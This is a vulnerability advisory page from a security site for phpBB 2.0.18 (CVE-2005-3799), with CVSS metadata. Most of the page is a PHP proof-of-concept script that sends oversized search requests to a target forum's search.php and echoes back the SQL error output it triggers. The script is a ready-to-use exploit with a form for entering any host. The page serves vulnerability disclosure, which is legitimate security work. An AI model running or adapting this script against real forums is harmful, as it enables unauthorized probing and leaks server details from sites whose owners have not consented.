phpBB 2.0.18 sql query problem PoC

2005-11-11 / 2005-09-30
Credit: Maksymilian Arciemowicz
Risk: Low
Local: No
Remote: No
CVE: CVE-2005-3799
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

<? # # phpBB2018 examples errors # Maksymilian Arciemowicz # cxib [at] cxsecurity [dot] com if(isset($_POST['HOST']) AND isset($_POST['CAT']) AND isset($_POST['ILE'])){ $POSTx="SecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurity"; # 2048b $POST = "mode=results&search_keywords="; for($x=1; $x<=$_POST['ILE']; $x++){ $POST .= $POSTx; # f(x)=x * 2048b } $sock = fsockopen($_POST['HOST'], 80); if (!$sock) {return false;} $out = "POST ".$_POST['CAT']."search.php HTTP/1.1\r\n"; $out .= "Host: ".$_POST['HOST']."\r\n"; $out .= "Content-Type: application/x-www-form-urlencoded\n"; $out .= "Content-Length: ".strlen($POST)."\n\n"; $out .= $POST."\r\n"; fwrite($sock, $out); $data=""; while(!feof($sock)) { $data .= fread($sock,4096); } fclose($sock); $data = substr($data, strpos($data,"\r\n\r\n")+4); echo $data; } else { echo "<CENTER> <A HREF=\"http://cxsecurity.com\"><IMG SRC=\"http://cxsecurity.com/gfx/small_log o.png\"></A><P> <FORM action=\"\" method=post enctype=\"multipart/form-data\"> HOST: <input TYPE=\"text\" name=\"HOST\"> Like www.cxsecurity.com<br> CATALOG: <input TYPE=\"text\" name=\"CAT\"> Like: /phpBB2/<br> f(x)= <input TYPE=\"text\" name=\"ILE\" value=\"512\"> x 2048b (example 512 x 2048)<br> <input TYPE=\"submit\" value=\"Send\"> </FORM>"; } ?>

References:

http://cxsecurity.com/issue/WLB-2005090050


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top